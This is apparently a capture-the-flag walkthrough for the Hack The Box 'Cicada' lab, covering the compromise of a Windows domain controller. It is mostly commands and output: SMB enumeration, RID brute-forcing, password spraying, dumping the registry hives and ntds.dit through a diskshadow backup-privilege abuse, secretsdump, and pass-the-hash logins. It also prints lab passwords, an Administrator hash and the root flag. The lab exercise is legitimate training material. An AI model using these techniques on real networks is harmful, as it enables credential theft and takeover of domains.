# Cicada

### Cicada HTB Detailed Walkthrough

### Initial Enumeration with Nmap

```bash
sudo nmap -p- -sVC 10.129.190.226
```

**Output:**\
Ports open include:

* 53 (DNS)
* 88 (Kerberos)
* 135, 139, 445 (SMB, RPC)
* 389/636 (LDAP/LDAPS)
* 3268/3269 (Global Catalog LDAP)
* 5985 (WinRM)
* 64827 (MSRPC)

Important service: `LDAP Domain: cicada.htb`, `Host: CICADA-DC`, `OS: Windows Server 2022`

### Enumerate SMB Shares (Anonymous)

```bash
nxc smb 10.129.190.226 --shares
```

**Error:** `STATUS_USER_SESSION_DELETED`

Try with anonymous:

```bash
nxc smb 10.129.190.226 -u '.' -p '' --shares
```

**Output:** Shares found: `ADMIN$`, `C$`, `DEV`, `HR`, `IPC$`, `NETLOGON`, `SYSVOL`

### Access HR Share

```bash
smbclient -U '.' //10.129.190.226/HR
```

```bash
mget "Notice from HR.txt"
```

**File Content:** Default password provided: `Cicada$M6Corpb*@Lp#nZp!8`

### RID Brute Force Users

```bash
nxc smb 10.129.190.226 -u '.' -p '' --rid-brute
```

**Discovered Users:** `john.smoulder`, `sarah.dantelia`, `michael.wrightson`, `david.orelious`, `emily.oscars`, etc.

### Prepare User List and Password Spray

```bash
cat > users.txt <<EOF
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
EOF
```

```bash
nxc smb 10.129.190.226 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
```

**Valid login:** `michael.wrightson`

### Enumerate More Users (with Valid Creds)

```bash
nxc smb 10.129.190.226 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
```

**Found Note in Description:** `david.orelious: Just in case I forget my password is aRt$Lp#7t*VQ!3`

### Access DEV Share with david.orelious

```bash
smbclient -U 'david.orelious' //10.129.190.226/DEV
```

```bash
mget Backup_script.ps1
```

**Content Reveals Credentials:** User: `emily.oscars`, Pass: `Q!3@Lp#M6b*7t*Vt`

### Access C$ and Retrieve user.txt

```bash
smbclient -U 'emily.oscars' //10.129.190.226/C$
cd Users/emily.oscars.CICADA/Desktop
mget user.txt
```

### Spawn Shell with Evil-WinRM

```bash
evil-winrm -i 10.129.190.226 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
```

### Dump Local Hashes (SAM & SYSTEM)

```powershell
reg save HKLM\SAM SAM
reg save HKLM\SYSTEM SYSTEM
download sam
download system
```

```bash
secretsdump local -sam sam -system system
```

**NT Hash Recovered:** `Administrator:2b87e7c93a3e8a0ea4a581937016f341`

### Confirm Administrator Access

```bash
nxc smb 10.129.190.226 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341
```

**Access Confirmed**

### Exploit SeBackupPrivilege (VSS Shadow Copy)

Create diskshadow script:

```
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup
```

Convert & Upload:

```bash
unix2dos diskshadow.txt
upload diskshadow.txt
```

Run diskshadow:

```powershell
diskshadow /s diskshadow.txt
```

Copy `ntds.dit`:

```powershell
robocopy /b E:\Windows\ntds . ntds.dit
download ntds.dit
```

### Dump Domain Secrets

```bash
secretsdump local -system system -ntds ntds.dit
```

Confirms Administrator and domain user hashes.

### Administrator WinRM Access & Root Flag

```bash
evil-winrm -i 10.129.190.226 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341
cd \Users\Administrator\Desktop
cat root.txt
```

**Root Flag:** `8921a5862c5fb0324cac27bcd44a833c`